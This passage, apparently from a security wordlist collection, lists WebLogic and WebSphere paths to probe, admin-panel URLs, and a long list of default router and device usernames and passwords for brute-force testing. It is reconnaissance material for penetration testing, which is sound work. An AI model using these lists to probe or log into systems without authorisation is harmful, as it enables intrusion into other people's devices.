| examplesWebApp/EJBeanManagedClient.jsp 185 | examplesWebApp/InteractiveQuery.jsp 186 | examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml 187 | examplesWebApp/SSLClientServlet 188 | examplesWebApp/SenderServlet 189 | examplesWebApp/SessionServlet 190 | examplesWebApp/Shutdown -> 401 191 | examplesWebApp/SimpleSqlServlet 192 | examplesWebApp/WebservicesEJB.jsp 193 | examplesWebApp/Wsdl2Service.jsp 194 | examplesWebApp/docs -> /docs 195 | examplesWebApp/docs/ 196 | examplesWebApp/domains 197 | examplesWebApp/examples 198 | examplesWebApp/examples/src/examples/copyright.html 199 | examplesWebApp/images 200 | examplesWebApp/index.jsp 201 | examplesWebApp/medrec 202 | examplesWebApp/server 203 | ext_servlet_annotations 204 | ext_servlet_annotations/loginForm.jsp 205 | ext_servlet_annotations/session 206 | fast_track.html 207 | fault 208 | file 209 | file/ 210 | fileRealm 211 | fileRealm.properties 212 | framework/skeletons/console/* 213 | framework/skeletons/console/css/* 214 | framework/skeletons/console/js/* 215 | getior 216 | getior/* 217 | graphics 218 | helloKona 219 | helloWebApp 220 | helloWebApp/hello.html 221 | helloWebApp/hello.jsp 222 | helloWorld 223 | iiop/ClientClose 224 | iiop/ClientClose/* 225 | iiop/ClientLogin 226 | iiop/ClientLogin/* 227 | iiop/ClientRecv 228 | iiop/ClientRecv/* 229 | iiop/ClientSend 230 | iiop/ClientSend/* 231 | images 232 | images/* 233 | index 234 | index.jsp 235 | internal 236 | jdbcRowSets 237 | jdbcRowSetsEar 238 | jdbc_rowsets 239 | jmssender 240 | jmstrader 241 | jsp/* 242 | jspSimpleTag 243 | jspSimpleTagEar 244 | jspbuild 245 | jws_basic_simple 246 | jws_basic_simple/SimpleService 247 | jwsdir 248 | login.jsp 249 | mainWebApp 250 | manifest.mf 251 | mapping 252 | mejb 253 | mydomain 254 | myservlet 255 | org.apache.beehive.netui.pageflow.PageFlowActionServlet 256 | org.apache.beehive.netui.pageflow.xmlhttprequest.XmlHttpRequestServlet 257 | page 258 | patient/login.do 259 | patient/register.do 260 | phone 261 | physican/login.do 262 | portalAppAdmin/login.jsp 263 | properties 264 | proxy 265 | psquare/* 266 | psquare/x.jsp 267 | public_html 268 | registerServlet 269 | reviewService 270 | reviewService/ClientServlet 271 | reviewService/InterceptorClientServlet 272 | reviewService/createArtist_service.jsp 273 | reviewService/dwr/* 274 | reviewService/index.jsp 275 | saml2 276 | samlacs 277 | samlars 278 | samlits 279 | samlits_ba 280 | samlits_cc 281 | servlet 282 | servletimages 283 | servlets/ 284 | session 285 | simpapp 286 | simple 287 | simpleFormServlet 288 | snoop 289 | stock 290 | stock/* 291 | stock/data/* 292 | stock/index.html 293 | stock/index.jsp 294 | stock/publisher.html 295 | stock/publisher.jsp 296 | survey 297 | system 298 | taglib-uri 299 | uddi 300 | uddi/* 301 | uddi/uddilistener 302 | uddiexplorer 303 | uddiexplorer/* 304 | uddiexplorer/Login.jsp 305 | uddiexplorer/index.jsp 306 | uddilistener 307 | user 308 | utils 309 | web 310 | web.xml 311 | webappCachingEar 312 | weblogic 313 | weblogic.cluster.GroupMessageHandlerServlet 314 | weblogic.cluster.MulticastSessionDataRecoveryServlet 315 | weblogic.cluster.StateDumpServlet 316 | weblogic.deploy.service.internal.transport.http.DeploymentServiceServlet 317 | weblogic.jar 318 | weblogic.management.servlet.BootstrapServlet 319 | weblogic.management.servlet.FileDistributionServlet 320 | weblogic.properties 321 | weblogic.rjvm.InternalWebAppListener 322 | weblogic.servlet.AsyncInitServlet 323 | weblogic.servlet.FileServlet 324 | weblogic.servlet.JSPClassServlet 325 | weblogic.testclient.CallbackHandler 326 | weblogic.wsee.async.AsyncResponseBean 327 | weblogic.wsee.async.AsyncResponseBeanSoap12 328 | weblogic.xml 329 | weblogic90 330 | webservice 331 | webservicesJwsSimpleEar 332 | webshare 333 | wl_management 334 | wl_management_internal 335 | wl_management_internal1 336 | wl_management_internal1/LogfileSearch 337 | wl_management_internal1/LogfileTail 338 | wl_management_internal2 339 | wl_management_internal2/Admin 340 | wl_management_internal2/Bootstrap 341 | wl_management_internal2/FileDistribution 342 | wl_management_internal2/wl_management 343 | wliconsole 344 | wls_utc 345 | wls_utc/*.do 346 | wls_utc/*.jpf 347 | wls_utc/*.render 348 | wls_utc/*.xhr 349 | wls_utc/CallbackHandler 350 | wls_utc/begin.do 351 | wls_utc/error.jsp 352 | wls_utc/index.html 353 | wls_utc/index.jsp 354 | wls_utc/messageLog.jsp 355 | wls_utc/selectWsdl.jsp 356 | wls_utc4 357 | wlserver 358 | wlstestclient 359 | wsee 360 | xmlBean 361 | xml_xmlBean 362 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/websphere.txt: -------------------------------------------------------------------------------- 1 | * 2 | *.do 3 | *.jsp 4 | *.jsv 5 | *.jsw 6 | AddressBookJ2WB 7 | AddressBookJ2WB/* 8 | AddressBookJ2WE/services/AddressBook 9 | AddressBookJ2WE/services/AddressBook/wsdl/* 10 | AddressBookW2JB 11 | AddressBookW2JB/* 12 | AddressBookW2JE/services/AddressBook 13 | AddressBookW2JE/services/AddressBook/wsdl/* 14 | AlbumCatalogWeb 15 | AlbumCatalogWeb/* 16 | AlbumCatalogWeb/docs/* 17 | AlbumCatalogWeb/docsservlet 18 | AlbumCatalogWeb/docsservlet/* 19 | AlbumCatalogWebservlet 20 | AlbumCatalogWebservlet/* 21 | AppInstallStatusServlet 22 | AppManagementStatus 23 | AppServer 24 | ApplicationProfileSample 25 | ApplicationProfileSample/* 26 | ApplicationProfileSample/docs/* 27 | ApplicationProfileSampleservlet 28 | ApplicationProfileSampleservlet/* 29 | BBApp 30 | Bank/*.jsp 31 | Bank/*.jsv 32 | Bank/*.jsw 33 | Bank/services/Transfer_SEI 34 | Bank/services/Transfer_SEI/wsdl 35 | Bank/services/Transfer_SEI/wsdl/* 36 | BeenThere 37 | ClusterRollout 38 | ControllerServlet 39 | DynaCacheESI 40 | DynaCacheESI/esiInavlidator 41 | DynamicQuery/EmployeeFinder 42 | DynamicQuery/EmployeeFinder/* 43 | DynamicQuery/docs/* 44 | ErrorReporter 45 | ErrorServlet 46 | FileTransfer 47 | GalleryMenu 48 | Greenhouse 49 | Greenhouse/* 50 | GreenhouseByWebSphere/docs/* 51 | GreenhouseEJB/services/GreenhouseFront 52 | GreenhouseEJB/services/GreenhouseFront/wsdl/* 53 | GreenhouseWeb 54 | GreenhouseWeb/* 55 | GreenhouseWebservlet 56 | GreenhouseWebservlet/* 57 | Greenhouseservlet 58 | Greenhouseservlet/* 59 | HelloHTML.jsp 60 | HelloHTMLError.jsp 61 | HelloPervasive 62 | HelloVXML.jsp 63 | HelloVXMLError.jsp 64 | HelloWML.jsp 65 | HelloWMLError.jsp 66 | HelloWorld 67 | HelloWorldServlet 68 | HitCount 69 | HitCount.jsp 70 | IBMDefaultErrorReporter 71 | IBMWebAS 72 | JTAExtensionsSamples/TransactionTracker 73 | JTAExtensionsSamples/TransactionTracker/* 74 | JTAExtensionsSamples/docs/* 75 | MessageDrivenBeans/docs/* 76 | MessageDrivenBeans/docsservlet/* 77 | OrderProcessorEJB/* 78 | OrderProcessorEJB/services/FrontGate 79 | OrderProcessorEJB/services/FrontGate/wsdl/* 80 | PlantsByWebSphere 81 | PlantsByWebSphere/* 82 | PlantsByWebSphere/docs 83 | PlantsByWebSphere/docs/* 84 | SamplesGallery 85 | SamplesGallery/* 86 | SimpleServlet 87 | SnoopServlet 88 | SourceCodeViewer 89 | Sourceservlet-classViewer 90 | StockQuote/*.jsp 91 | StockQuote/*.jsv 92 | StockQuote/*.jsw 93 | StockQuote/services/xmltoday-delayed-quotes 94 | StockQuote/services/xmltoday-delayed-quotes/wsdl/* 95 | TechnologySamples/AddressBook 96 | TechnologySamples/AddressBook/* 97 | TechnologySamples/AddressBook/AddressBookServlet 98 | TechnologySamples/AddressBook/servlet/* 99 | TechnologySamples/BasicCalculator 100 | TechnologySamples/BasicCalculator/* 101 | TechnologySamples/BulletinBoard 102 | TechnologySamples/BulletinBoard/* 103 | TechnologySamples/BulletinBoardservlet 104 | TechnologySamples/BulletinBoardservlet/* 105 | TechnologySamples/Calendar 106 | TechnologySamples/Calendar/* 107 | TechnologySamples/FilterServlet 108 | TechnologySamples/FilterServlet/* 109 | TechnologySamples/FormLogin 110 | TechnologySamples/FormLogin/* 111 | TechnologySamples/FormLoginservlet 112 | TechnologySamples/FormLoginservlet/* 113 | TechnologySamples/JAASLogin 114 | TechnologySamples/JAASLogin/* 115 | TechnologySamples/JAASLoginservlet 116 | TechnologySamples/JAASLoginservlet/* 117 | TechnologySamples/MovieReview 118 | TechnologySamples/MovieReview/* 119 | TechnologySamples/MovieReview2_0 120 | TechnologySamples/MovieReview2_0/* 121 | TechnologySamples/MovieReview2_1 122 | TechnologySamples/MovieReview2_1/* 123 | TechnologySamples/PageReturner 124 | TechnologySamples/PageReturner/* 125 | TechnologySamples/PageReturnerservlet 126 | TechnologySamples/PageReturnerservlet/* 127 | TechnologySamples/ReadingList 128 | TechnologySamples/ReadingList/* 129 | TechnologySamples/SimpleJSP 130 | TechnologySamples/SimpleJSP/* 131 | TechnologySamples/SimpleServlet 132 | TechnologySamples/SimpleServlet/* 133 | TechnologySamples/Subscription 134 | TechnologySamples/Subscription/* 135 | TechnologySamples/Subscriptionservlet 136 | TechnologySamples/Subscriptionservlet/* 137 | TechnologySamples/Taglib 138 | TechnologySamples/Taglib/* 139 | TechnologySamples/docs 140 | TechnologySamples/docs/* 141 | TechnologySamples/docs/chs 142 | TechnologySamples/docs/chs/* 143 | TechnologySamples/docs/cht 144 | TechnologySamples/docs/cht/* 145 | TechnologySamples/docs/deu 146 | TechnologySamples/docs/deu/* 147 | TechnologySamples/docs/en 148 | TechnologySamples/docs/en/* 149 | TechnologySamples/docs/esp 150 | TechnologySamples/docs/esp/* 151 | TechnologySamples/docs/fra 152 | TechnologySamples/docs/fra/* 153 | TechnologySamples/docs/ita 154 | TechnologySamples/docs/ita/* 155 | TechnologySamples/docs/jpn 156 | TechnologySamples/docs/jpn/* 157 | TechnologySamples/docs/kor 158 | TechnologySamples/docs/kor/* 159 | TechnologySamples/docs/ptb 160 | TechnologySamples/docs/ptb/* 161 | WSsamples 162 | WSsamples/* 163 | WSsamples/en 164 | WSsamples/en/* 165 | WSsamples/index.jsp 166 | WarehouseEJB/*.jsp 167 | WarehouseEJB/*.jsv 168 | WarehouseEJB/*.jsw 169 | WarehouseEJB/services/WarehouseFront 170 | WarehouseEJB/services/WarehouseFront/wsdl/* 171 | WarehouseWeb 172 | WarehouseWeb/* 173 | WarehouseWebservlet 174 | WarehouseWebservlet/* 175 | WebServicesSamples/docs/* 176 | WebSphere 177 | WebSphereBank 178 | WebSphereBank/* 179 | WebSphereBankDeposit 180 | WebSphereBankDeposit/* 181 | WebSphereBankDepositservlet 182 | WebSphereBankDepositservlet/* 183 | WebSphereBankservlet 184 | WebSphereBankservlet/* 185 | WebSphereSamples 186 | WebSphereSamples.Configuration.config 187 | WebSphereSamples/ 188 | WebSphereSamples/SingleSamples/AccountAndTransfer/create.html 189 | WebSphereSamples/SingleSamples/Increment/increment.html 190 | WebSphereSamples/YourCo/main.html 191 | _DynaCacheEsi 192 | _DynaCacheEsi/* 193 | _DynaCacheEsi/esiInvalidator 194 | ab/* 195 | ab/docs/* 196 | activitysessions/docs/* 197 | addNodeListener 198 | admin 199 | admin-authz.xml 200 | admin.conf 201 | admin.passwd 202 | admin/* 203 | admin/logon.jsp 204 | admin/secure/logon.jsp 205 | apadminred 206 | apadminred.html 207 | aphtpasswd.html 208 | asynchbeans/* 209 | asynchbeans/docs/* 210 | cachemonitor 211 | cachemonitor/statistics.jsp 212 | cell.xml 213 | cells 214 | cgi-bin 215 | cgi-bin/ 216 | com.ibm.ws.console.events 217 | com.ibm.ws.console.events/runtime_messages.jsp 218 | config 219 | console 220 | debug_error.jsp 221 | error 222 | error.jsp 223 | esiInavlidator 224 | estore 225 | estore/annotated-index.html 226 | estore/index.html 227 | estore/populate 228 | examples 229 | hello 230 | helloEJB 231 | hitcount 232 | httpd.conf 233 | i18nctxSample 234 | i18nctxSample/* 235 | i18nctxSample/docs/* 236 | ibm 237 | ibm/console 238 | icons 239 | images 240 | index.html 241 | index.jsp 242 | ivt 243 | ivt/* 244 | ivt/ivtDate.jsp 245 | ivt/ivtejb 246 | ivt/ivtservler 247 | ivt/ivtservlet 248 | ivtejb 249 | ivtserver 250 | ivtservlet 251 | jsp 252 | j_security_check 253 | login.html 254 | manual 255 | manual/index.html 256 | node.xml 257 | nodes 258 | opc/*.jsp 259 | opc/*.jsv 260 | opc/*.jsw 261 | opc/services/BrokerServiceIntfPort 262 | opc/services/BrokerServiceIntfPort/wsdl/* 263 | opc/services/OrderTrackingIntfPort 264 | opc/services/OrderTrackingIntfPort/wsdl/* 265 | opc/services/PurchaseOrderIntfPort 266 | opc/services/PurchaseOrderIntfPort/wsdl/* 267 | opt 268 | petstore 269 | petstore/* 270 | ping 271 | removeNodeListener 272 | resources.xml 273 | runtime_messages.jsp 274 | samples/activitysessions 275 | samples/activitysessions/* 276 | scheduler 277 | scheduler/* 278 | scheduler/docs/* 279 | scripts 280 | secure/downloadFile/* 281 | securecleanup 282 | security.xml 283 | server-info 284 | server-status 285 | server.xml 286 | serverindex.xml 287 | servers 288 | servlet 289 | servlet/* 290 | servlet/ControllerServlet 291 | servlet/ErrorReporter 292 | servlet/HelloWorldServlet 293 | servlet/HitCount 294 | servlet/SimpleServlet 295 | servlet/SnoopServlet 296 | servlet/TheExpiringHTMLServlet 297 | servlet/WebSphereSamples.Configuration.config 298 | servlet/WebSphereSamples.Form.FormServlet 299 | servlet/WebSphereSamples.YourCo.News.NewsServlet 300 | servlet/aphtpassword 301 | servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet 302 | servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter 303 | servlet/com.ibm.servlet.engine.webapp.InvokerServlet 304 | servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet 305 | servlet/com.ibm.servlet.engine.webapp.UncaughtServletException 306 | servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport 307 | servlet/hello 308 | servlet/snoop 309 | servlet/snoop2 310 | servletcache 311 | showCfg 312 | sibstatus 313 | simple.jsp 314 | simpleJSP 315 | snoop 316 | snoop/* 317 | snoop2 318 | statistics.jsp 319 | status 320 | statuspoll 321 | theme 322 | tradetheme 323 | transfer 324 | uddigui/* 325 | uddisoap/* 326 | variables.xml 327 | very_simple.jsp 328 | virtualhosts.xml 329 | wasPerfTool 330 | wasPerfTool/* 331 | wasPerfToolservlet 332 | wasPerfToolservlet/* 333 | webapp 334 | webapp/examples/ErrorServlet 335 | webapp/examples/HelloPervasive 336 | webapp/examples/HitCount 337 | webapp/examples/SourceCodeViewer 338 | webapp/examples/login.html 339 | webapp/examples/ping 340 | webapp/examples/showCfg 341 | webapp/examples/showcfg 342 | webapp/examples/simple.jsp 343 | webapp/examples/verify 344 | webexec 345 | workarea/* 346 | workarea/docs/* 347 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/admin-panels.txt: -------------------------------------------------------------------------------- 1 | admin/ 2 | administrator/ 3 | admin1/ 4 | admin2/ 5 | admin3/ 6 | admin4/ 7 | admin5/ 8 | usuarios/ 9 | usuario/ 10 | moderator/ 11 | webadmin/ 12 | adminarea/ 13 | bb-admin/ 14 | adminLogin/ 15 | admin_area/ 16 | panel-administracion/ 17 | instadmin/ 18 | memberadmin/ 19 | administratorlogin/ 20 | adm/ 21 | admin/account.php 22 | admin/index.php 23 | admin/login.php 24 | admin/admin.php 25 | admin_area/admin.php 26 | admin_area/login.php 27 | siteadmin/login.php 28 | siteadmin/index.php 29 | siteadmin/login.html 30 | admin/account.html 31 | admin/index.html 32 | admin/login.html 33 | admin/admin.html 34 | admin_area/index.php 35 | bb-admin/index.php 36 | bb-admin/login.php 37 | bb-admin/admin.php 38 | admin/home.php 39 | admin_area/login.html 40 | admin_area/index.html 41 | admin/controlpanel.php 42 | admin.php 43 | admincp/index.asp 44 | admincp/login.asp 45 | admincp/index.html 46 | adminpanel.html 47 | webadmin.html 48 | webadmin/index.html 49 | webadmin/admin.html 50 | webadmin/login.html 51 | admin/admin_login.html 52 | admin_login.html 53 | panel-administracion/login.html 54 | admin/cp.php 55 | cp.php 56 | administrator/index.php 57 | administrator/login.php 58 | nsw/admin/login.php 59 | webadmin/login.php 60 | admin/admin_login.php 61 | admin_login.php 62 | administrator/account.php 63 | administrator.php 64 | admin_area/admin.html 65 | pages/admin/admin-login.php 66 | admin/admin-login.php 67 | admin-login.php 68 | bb-admin/index.html 69 | bb-admin/login.html 70 | acceso.php 71 | bb-admin/admin.html 72 | admin/home.html 73 | login.php 74 | modelsearch/login.php 75 | moderator.php 76 | moderator/login.php 77 | moderator/admin.php 78 | account.php 79 | pages/admin/admin-login.html 80 | admin/admin-login.html 81 | admin-login.html 82 | controlpanel.php 83 | admincontrol.php 84 | admin/adminLogin.html 85 | adminLogin.html 86 | home.html 87 | rcjakar/admin/login.php 88 | adminarea/index.html 89 | adminarea/admin.html 90 | webadmin.php 91 | webadmin/index.php 92 | webadmin/admin.php 93 | admin/controlpanel.html 94 | admin.html 95 | admin/cp.html 96 | cp.html 97 | adminpanel.php 98 | moderator.html 99 | administrator/index.html 100 | administrator/login.html 101 | user.html 102 | administrator/account.html 103 | administrator.html 104 | login.html 105 | modelsearch/login.html 106 | moderator/login.html 107 | adminarea/login.html 108 | panel-administracion/index.html 109 | panel-administracion/admin.html 110 | modelsearch/index.html 111 | modelsearch/admin.html 112 | admincontrol/login.html 113 | adm/index.html 114 | adm.html 115 | moderator/admin.html 116 | user.php 117 | account.html 118 | controlpanel.html 119 | admincontrol.html 120 | panel-administracion/login.php 121 | wp-login.php 122 | adminLogin.php 123 | admin/adminLogin.php 124 | home.php 125 | adminarea/index.php 126 | adminarea/admin.php 127 | adminarea/login.php 128 | panel-administracion/index.php 129 | panel-administracion/admin.php 130 | modelsearch/index.php 131 | modelsearch/admin.php 132 | admincontrol/login.php 133 | adm/admloginuser.php 134 | admloginuser.php 135 | admin2.php 136 | admin2/login.php 137 | admin2/index.php 138 | usuarios/login.php 139 | adm/index.php 140 | adm.php 141 | affiliate.php 142 | adm_auth.php 143 | memberadmin.php 144 | administratorlogin.php 145 | account.asp 146 | admin/account.asp 147 | admin/index.asp 148 | admin/login.asp 149 | admin/admin.asp 150 | admin_area/admin.asp 151 | admin_area/login.asp 152 | admin_area/index.asp 153 | bb-admin/index.asp 154 | bb-admin/login.asp 155 | bb-admin/admin.asp 156 | admin/home.asp 157 | admin/controlpanel.asp 158 | admin.asp 159 | pages/admin/admin-login.asp 160 | admin/admin-login.asp 161 | admin-login.asp 162 | admin/cp.asp 163 | cp.asp 164 | administrator/account.asp 165 | administrator.asp 166 | acceso.asp 167 | login.asp 168 | modelsearch/login.asp 169 | moderator.asp 170 | moderator/login.asp 171 | administrator/login.asp 172 | moderator/admin.asp 173 | controlpanel.asp 174 | user.asp 175 | admincontrol.asp 176 | adminpanel.asp 177 | webadmin.asp 178 | webadmin/index.asp 179 | webadmin/admin.asp 180 | webadmin/login.asp 181 | admin/admin_login.asp 182 | admin_login.asp 183 | panel-administracion/login.asp 184 | adminLogin.asp 185 | admin/adminLogin.asp 186 | home.asp 187 | adminarea/index.asp 188 | adminarea/admin.asp 189 | adminarea/login.asp 190 | panel-administracion/index.asp 191 | panel-administracion/admin.asp 192 | modelsearch/index.asp 193 | modelsearch/admin.asp 194 | administrator/index.asp 195 | admincontrol/login.asp 196 | adm/admloginuser.asp 197 | admloginuser.asp 198 | admin2.asp 199 | admin2/login.asp 200 | admin2/index.asp 201 | adm/index.asp 202 | adm.asp 203 | affiliate.asp 204 | adm_auth.asp 205 | memberadmin.asp 206 | administratorlogin.asp 207 | siteadmin/login.asp 208 | siteadmin/index.asp 209 | admin/account.cfm 210 | admin/index.cfm 211 | admin/login.cfm 212 | admin/admin.cfm 213 | admin_area/admin.cfm 214 | admin_area/login.cfm 215 | siteadmin/login.cfm 216 | siteadmin/index.cfm 217 | admin_area/index.cfm 218 | bb-admin/index.cfm 219 | bb-admin/login.cfm 220 | bb-admin/admin.cfm 221 | admin/home.cfm 222 | admin/controlpanel.cfm 223 | admin.cfm 224 | admin/cp.cfm 225 | cp.cfm 226 | administrator/index.cfm 227 | administrator/login.cfm 228 | nsw/admin/login.cfm 229 | webadmin/login.cfm 230 | admin/admin_login.cfm 231 | admin_login.cfm 232 | administrator/account.cfm 233 | administrator.cfm 234 | pages/admin/admin-login.cfm 235 | admin/admin-login.cfm 236 | admin-login.cfm 237 | login.cfm 238 | modelsearch/login.cfm 239 | moderator.cfm 240 | moderator/login.cfm 241 | moderator/admin.cfm 242 | account.cfm 243 | controlpanel.cfm 244 | admincontrol.cfm 245 | acceso.cfm 246 | rcjakar/admin/login.cfm 247 | webadmin.cfm 248 | webadmin/index.cfm 249 | webadmin/admin.cfm 250 | adminpanel.cfm 251 | user.cfm 252 | panel-administracion/login.cfm 253 | wp-login.cfm 254 | adminLogin.cfm 255 | admin/adminLogin.cfm 256 | home.cfm 257 | adminarea/index.cfm 258 | adminarea/admin.cfm 259 | adminarea/login.cfm 260 | panel-administracion/index.cfm 261 | panel-administracion/admin.cfm 262 | modelsearch/index.cfm 263 | modelsearch/admin.cfm 264 | admincontrol/login.cfm 265 | adm/admloginuser.cfm 266 | admloginuser.cfm 267 | admin2.cfm 268 | admin2/login.cfm 269 | admin2/index.cfm 270 | usuarios/login.cfm 271 | adm/index.cfm 272 | adm.cfm 273 | affiliate.cfm 274 | adm_auth.cfm 275 | memberadmin.cfm 276 | administratorlogin.cfm 277 | admin/account.js 278 | admin/index.js 279 | admin/login.js 280 | admin/admin.js 281 | admin_area/admin.js 282 | admin_area/login.js 283 | siteadmin/login.js 284 | siteadmin/index.js 285 | admin_area/index.js 286 | bb-admin/index.js 287 | bb-admin/login.js 288 | bb-admin/admin.js 289 | admin/home.js 290 | admin/controlpanel.js 291 | admin.js 292 | admin/cp.js 293 | cp.js 294 | administrator/index.js 295 | administrator/login.js 296 | nsw/admin/login.js 297 | webadmin/login.js 298 | admin/admin_login.js 299 | admin_login.js 300 | administrator/account.js 301 | administrator.js 302 | pages/admin/admin-login.js 303 | admin/admin-login.js 304 | admin-login.js 305 | login.js 306 | modelsearch/login.js 307 | moderator.js 308 | moderator/login.js 309 | moderator/admin.js 310 | account.js 311 | controlpanel.js 312 | admincontrol.js 313 | rcjakar/admin/login.js 314 | webadmin.js 315 | webadmin/index.js 316 | acceso.js 317 | webadmin/admin.js 318 | adminpanel.js 319 | user.js 320 | panel-administracion/login.js 321 | wp-login.js 322 | adminLogin.js 323 | admin/adminLogin.js 324 | home.js 325 | adminarea/index.js 326 | adminarea/admin.js 327 | adminarea/login.js 328 | panel-administracion/index.js 329 | panel-administracion/admin.js 330 | modelsearch/index.js 331 | modelsearch/admin.js 332 | admincontrol/login.js 333 | adm/admloginuser.js 334 | admloginuser.js 335 | admin2.js 336 | admin2/login.js 337 | admin2/index.js 338 | usuarios/login.js 339 | adm/index.js 340 | adm.js 341 | affiliate.js 342 | adm_auth.js 343 | memberadmin.js 344 | administratorlogin.js 345 | admin/account.cgi 346 | admin/index.cgi 347 | admin/login.cgi 348 | admin/admin.cgi 349 | admin_area/admin.cgi 350 | admin_area/login.cgi 351 | siteadmin/login.cgi 352 | siteadmin/index.cgi 353 | admin_area/index.cgi 354 | bb-admin/index.cgi 355 | bb-admin/login.cgi 356 | bb-admin/admin.cgi 357 | admin/home.cgi 358 | admin/controlpanel.cgi 359 | admin.cgi 360 | admin/cp.cgi 361 | cp.cgi 362 | administrator/index.cgi 363 | administrator/login.cgi 364 | nsw/admin/login.cgi 365 | webadmin/login.cgi 366 | admin/admin_login.cgi 367 | admin_login.cgi 368 | administrator/account.cgi 369 | administrator.cgi 370 | pages/admin/admin-login.cgi 371 | admin/admin-login.cgi 372 | admin-login.cgi 373 | login.cgi 374 | modelsearch/login.cgi 375 | moderator.cgi 376 | moderator/login.cgi 377 | moderator/admin.cgi 378 | account.cgi 379 | controlpanel.cgi 380 | admincontrol.cgi 381 | rcjakar/admin/login.cgi 382 | webadmin.cgi 383 | webadmin/index.cgi 384 | acceso.cgi 385 | webadmin/admin.cgi 386 | adminpanel.cgi 387 | user.cgi 388 | panel-administracion/login.cgi 389 | wp-login.cgi 390 | adminLogin.cgi 391 | admin/adminLogin.cgi 392 | home.cgi 393 | adminarea/index.cgi 394 | adminarea/admin.cgi 395 | adminarea/login.cgi 396 | panel-administracion/index.cgi 397 | panel-administracion/admin.cgi 398 | modelsearch/index.cgi 399 | modelsearch/admin.cgi 400 | admincontrol/login.cgi 401 | adm/admloginuser.cgi 402 | admloginuser.cgi 403 | admin2.cgi 404 | admin2/login.cgi 405 | admin2/index.cgi 406 | usuarios/login.cgi 407 | adm/index.cgi 408 | adm.cgi 409 | affiliate.cgi 410 | adm_auth.cgi 411 | memberadmin.cgi 412 | administratorlogin.cgi 413 | admin_panel/ 414 | admin_panel.html 415 | adm_cp/ -------------------------------------------------------------------------------- /wordlists/metasploit/routers_userpass.txt: -------------------------------------------------------------------------------- 1 | ADMINISTRATOR ADMINISTRATOR 2 | ADMN admn 3 | Admin admin 4 | Administrator 5 | Administrator 3ware 6 | Administrator admin 7 | Administrator changeme 8 | Administrator ganteng 9 | Administrator letmein 10 | Administrator password 11 | Administrator pilou 12 | Administrator smcadmin 13 | Any 12345 14 | CSG SESAME 15 | Cisco Cisco 16 | D-Link D-Link 17 | DTA TJM 18 | GEN1 gen1 19 | GEN2 gen2 20 | GlobalAdmin GlobalAdmin 21 | HTTP HTTP 22 | IntraStack Asante 23 | IntraSwitch Asante 24 | JDE JDE 25 | LUCENT01 UI-PSWD-01 26 | LUCENT02 UI-PSWD-02 27 | MDaemon MServer 28 | MICRO RSX 29 | Manager Manager 30 | Manager friend 31 | NAU NAU 32 | NETWORK NETWORK 33 | NICONEX NICONEX 34 | PBX PBX 35 | PFCUser 240653C9467E45 36 | PRODDTA PRODDTA 37 | PSEAdmin $secure$ 38 | PlcmSpIp PlcmSpIp 39 | Polycom SpIp 40 | RMUser1 password 41 | SYSADM sysadm 42 | Sweex Mysweex 43 | USERID PASSW0RD 44 | User Password 45 | VNC winterm 46 | VTech VTech 47 | ZXDSL ZXDSL 48 | acc acc 49 | adfexc adfexc 50 | adm 51 | admin 52 | admin 0 53 | admin 0000 54 | admin 1111 55 | admin 11111111 56 | admin 123 57 | admin 1234 58 | admin 123456 59 | admin 1234567890 60 | admin 1234admin 61 | admin 2222 62 | admin 22222 63 | admin 3477 64 | admin 3ascotel 65 | admin 7ujMko0admin 66 | admin 7ujMko0vizxv 67 | admin 9999 68 | admin Admin 69 | admin AitbISP4eCiG 70 | admin Ascend 71 | admin BRIDGE 72 | admin Intel 73 | admin MiniAP 74 | admin NetCache 75 | admin NetICs 76 | admin OCS 77 | admin P@55w0rd! 78 | admin PASSWORD 79 | admin Protector 80 | admin SMDR 81 | admin SUPER 82 | admin Symbol 83 | admin TANDBERG 84 | admin _Cisco 85 | admin access 86 | admin admin 87 | admin admin117.35.97.74 88 | admin admin123 89 | admin admin1234 90 | admin administrator 91 | admin adminttd 92 | admin adslolitec 93 | admin adslroot 94 | admin adtran 95 | admin articon 96 | admin asante 97 | admin ascend 98 | admin asd 99 | admin atc123 100 | admin atlantis 101 | admin backdoor 102 | admin barricade 103 | admin barricadei 104 | admin bintec 105 | admin cableroot 106 | admin changeme 107 | admin cisco 108 | admin comcomcom 109 | admin conexant 110 | admin default 111 | admin diamond 112 | admin enter 113 | admin epicrouter 114 | admin extendnet 115 | admin fliradmin 116 | admin giraff 117 | admin hagpolm1 118 | admin hello 119 | admin help 120 | admin hp.com 121 | admin ironport 122 | admin isee 123 | admin jvc 124 | admin kont2004 125 | admin letmein 126 | admin leviton 127 | admin linga 128 | admin meinsma 129 | admin michaelangelo 130 | admin michelangelo 131 | admin microbusiness 132 | admin motorola 133 | admin mu 134 | admin my_DEMARC 135 | admin netadmin 136 | admin noway 137 | admin oelinux123 138 | admin operator 139 | admin p-assword 140 | admin pass 141 | admin password 142 | admin passwort 143 | admin pento 144 | admin pfsense 145 | admin private 146 | admin public 147 | admin pwp 148 | admin radius 149 | admin rmnetlm 150 | admin root 151 | admin secure 152 | admin service 153 | admin setup 154 | admin sitecom 155 | admin smallbusiness 156 | admin smcadmin 157 | admin speedxess 158 | admin superuser 159 | admin support 160 | admin switch 161 | admin synnet 162 | admin sysAdmin 163 | admin system 164 | admin tech 165 | admin ubnt 166 | admin visual 167 | admin w2402 168 | admin wbox 169 | admin xad$l#12 170 | admin xad$|#12 171 | admin zoomadsl 172 | admin2 changeme 173 | administrator administrator 174 | administrator changeme 175 | adminstat OCS 176 | adminstrator changeme 177 | adminttd adminttd 178 | adminuser OCS 179 | adminview OCS 180 | alpine alpine 181 | ami 182 | anonymous Exabyte 183 | anonymous any@ 184 | apc apc 185 | at4400 at4400 186 | bbsd-client NULL 187 | bbsd-client changeme2 188 | bciim bciimpw 189 | bcim bcimpw 190 | bcms bcmspw 191 | bcnas bcnaspw 192 | bcnas pcnaspw 193 | blue bluepw 194 | browse browsepw 195 | browse looker 196 | cablecom router 197 | cablemodem robotics 198 | cac_admin cacadmin 199 | cas cascade 200 | ccrusr ccrusr 201 | cellit cellit 202 | cgadmin cgadmin 203 | cisco 204 | cisco cisco 205 | citel citel 206 | client client 207 | cmaker cmaker 208 | comcast 1234 209 | corecess corecess 210 | craft 211 | craft 